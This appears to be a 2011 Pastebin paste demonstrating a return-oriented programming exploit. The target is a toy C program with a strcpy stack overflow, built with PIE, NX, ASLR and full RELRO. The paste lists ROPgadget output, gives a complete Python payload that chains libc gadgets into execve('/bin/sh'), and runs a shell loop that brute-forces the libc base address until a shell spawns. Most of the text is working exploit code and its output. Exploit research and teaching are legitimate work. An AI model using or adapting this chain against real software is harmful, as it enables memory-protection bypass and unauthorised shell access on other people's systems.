Guest User

Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO

a guest
Dec 1st, 2011
2,581
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO
  2.  
  3.  
  4. Simple binary vuln:
  5.  
  6. [jonathan@Archlinux rop-bf]$ cat main.c
  7. #include <stdio.h>
  8. #include <string.h>
  9. #include <stdlib.h>
  10.  
  11. int main(int argc, char **argv)
  12. {
  13.   char buff[32];
  14.  
  15.   strcpy(buff, argv[1]);
  16.  
  17.   return (0);
  18. }
  19.  
  20. Compiled with "gcc -o main main.c -pie"
  21.  
  22. PIE    Enable
  23. ASLR   Enable
  24. NX     Enable
  25. RELRO  Full
  26.  
  27.  
  28. Search gadget with ROPgadget
  29.  
  30. [jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
  31. Gadgets information
  32. ============================================================
  33. 0x000003e6: pop %edi | ret
  34. 0x00000405: add $0x08,%esp | pop %ebx | ret
  35. 0x00000408: pop %ebx | ret
  36. 0x00000492: mov (%esp),%ebx | ret
  37. 0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
  38. 0x0000051e: pop %ebp | ret
  39. 0x0000054f: call *%eax
  40. 0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
  41. 0x00000554: pop %ebx | pop %ebp | ret
  42. 0x00000595: mov $0x81ffffff,%esi | ret
  43. 0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
  44.  
  45. Unique gadgets found: 11
  46.  
  47.  
  48. Fuck just 11 gadgets found. :/
  49.  
  50.  
  51. So, we search gadget in /lib/libc.so.6 and we bruteforce the base address
  52.  
  53.  
  54. Exploit:
  55.  
  56. [jonathan@Archlinux rop-bf]$ cat exploit.py
  57. #!/usr/bin/python2
  58.  
  59. from struct import pack
  60.  
  61. base_addr = 0xb770a000
  62.  
  63. p = "a" * 44
  64. # execve /bin/sh generated by RopGadget v3.3
  65. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  66. p += pack("<I", 0x42424242) # padding
  67. p += pack("<I", base_addr + 0x00178020)  # @ .data
  68. p += pack("<I", 0x42424242) # padding
  69. p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
  70. p += "/bin"
  71. p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
  72. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  73. p += pack("<I", 0x42424242) # padding
  74. p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
  75. p += pack("<I", 0x42424242) # padding
  76. p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
  77. p += "//sh"
  78. p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
  79. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  80. p += pack("<I", 0x42424242) # padding
  81. p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
  82. p += pack("<I", 0x42424242) # padding
  83. p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
  84. p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
  85. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  86. p += pack("<I", 0x42424242) # padding
  87. p += pack("<I", 0x42424242) # padding
  88. p += pack("<I", base_addr + 0x00178020) # @ .data
  89. p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
  90. p += pack("<I", 0x42424242) # padding
  91. p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
  92. p += pack("<I", base_addr + 0x00178020) # @data
  93. p += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret
  94. p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
  95. p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
  96. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  97. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  98. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  99. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  100. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  101. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  102. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  103. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  104. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  105. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  106. p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
  107. p += pack("<I", base_addr + 0x0002dc45) # int $0x80
  108.  
  109. print p
  110.  
  111.  
  112.  
  113. Ok let's go bruteforce:
  114.  
  115.  
  116. [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
  117. Segmentation fault
  118. Segmentation fault
  119. Segmentation fault
  120. Segmentation fault
  121. Segmentation fault
  122. [...]
  123. Segmentation fault
  124. Segmentation fault
  125. Segmentation fault
  126. Segmentation fault
  127. Segmentation fault
  128. Segmentation fault
  129. Segmentation fault
  130. sh-4.2$
  131.  
  132. New feature in future ropgadget: ROPmaker for bruteforce Libc
  133.  
  134.  
  135. - http://shell-storm.org/project/ROPgadget/
  136.  
  137. @jonathansalwan
  138.  
  139.  
RAW Paste Data